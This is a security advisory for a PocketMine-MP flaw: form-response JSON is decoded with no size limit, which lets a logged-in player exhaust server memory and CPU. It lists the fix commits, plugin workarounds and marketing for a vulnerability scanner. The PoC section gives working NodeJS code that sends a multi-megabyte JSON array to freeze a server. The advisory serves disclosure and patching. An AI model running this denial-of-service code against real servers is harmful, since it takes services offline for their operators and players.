GHSA-788v-5pfp-93ff
PocketMine-MP: JSON decoding of unlimited size large arrays/objects in ModalFormResponse Handling
Blast Radius
pocketmine/pocketmine-mpReal-time download stats are indexed for npm and PyPI packages. This vulnerability affects Packagist packages — download data is not available via public APIs for these ecosystems.
Description
Impact
The server does not meaningfully limit the size of the JSON payload in ModalFormResponsePacket. This can be abused by an attacker to waste memory and CPU on an affected server, e.g. by sending arrays with millions of elements.
The player must have a full session on the server (i.e. spawned in the world) to exploit this, as form responses are not handled unless the player is in game.
Patches
The issue was fixed in two parts:
- cef1088341e40ee7a6fa079bca47a84f3524d877 limits the size of a single form response to 10 KB, which is well above expected size, but low enough to prevent abuse
- f983f4f66d5e72d7a07109c8175799ab0ee771d5 avoids decoding the form response if there is no form associated with the given ID
Workarounds
This issue can be worked around in a plugin using DataPacketReceiveEvent by:
- checking the max size of the
formDatafield - making sure the form ID is not repeated
However, a full workaround for the issue would require reflection to access the Player->forms property, which is not exposed via any accessible API prior to 5.39.2.
PoC
-
Join a PocketMine-MP server as a regular player (no special permissions needed).
-
Use a modified client or packet-sending script to send a
ModalFormResponsePacketwith:- Any non-existent
formId formDatacontaining a massive JSON array (e.g., 10+ MB payload).
- Any non-existent
-
The server will attempt to parse the JSON and may freeze or become unresponsive.
Example NodeJS pseudocode:
import { createClient } from 'bedrock-protocol';
const host = '127.0.0.1';
const port = 19132;
const username = 'Test';
const client = createClient({
host,
port,
username,
offline: true
});
const hugePayload = '[' + '0,'.repeat(5_000_000) + '0]';
client.on('spawn', () => {
console.log('[*] Connected & spawned. Sending malicious packet...');
client.write('modal_form_response', {
formId: 9999, // Form inexistant
formData: hugePayload // JSON énorme
});
console.log('[*] Packet sent. The server should start freezing shortly.');
});
Affected Packages
| Ecosystem | Package | Vulnerable range | Fix |
|---|---|---|---|
| 🐘Packagist | pocketmine/pocketmine-mp | all versions | 5.39.2 |
Detection & mitigation playbook
Open-source dependencyDetect
Scan your dependency tree (package-lock.json, pnpm-lock.yaml, requirements.txt, go.sum, etc.) for pocketmine/pocketmine-mp. O3's reachability analysis confirms whether the vulnerable code path is actually invoked in your application, so you act on real exposure instead of every transitive match.
Fix
Update pocketmine/pocketmine-mp to 5.39.2 or later, then make sure no transitive (indirect) dependency still pins the vulnerable range — O3 confirms GHSA-788v-5pfp-93ff is resolved across your whole dependency graph.
Workarounds
If you can't upgrade right away: gate or disable the affected feature, validate untrusted input at the boundary, and avoid passing attacker-controlled data into the vulnerable path. O3's runtime protection blocks exploitation in production as an interim safeguard until the upgrade lands.
How O3 protects you
O3 pinpoints whether GHSA-788v-5pfp-93ff is reachable in your code and exactly where to fix it, then blocks exploitation in production at runtime until the patched version is deployed.
Tailored to GHSA-788v-5pfp-93ff. Runtime protection reduces exposure until a permanent patch is applied and verified — it complements patching, it doesn't replace it.
Frequently Asked Questions
Is GHSA-788v-5pfp-93ff in your dependencies?
O3 detects GHSA-788v-5pfp-93ff across Packagist dependencies and uses function-level reachability to confirm whether the vulnerable code path is actually reachable — not just present. No false positives.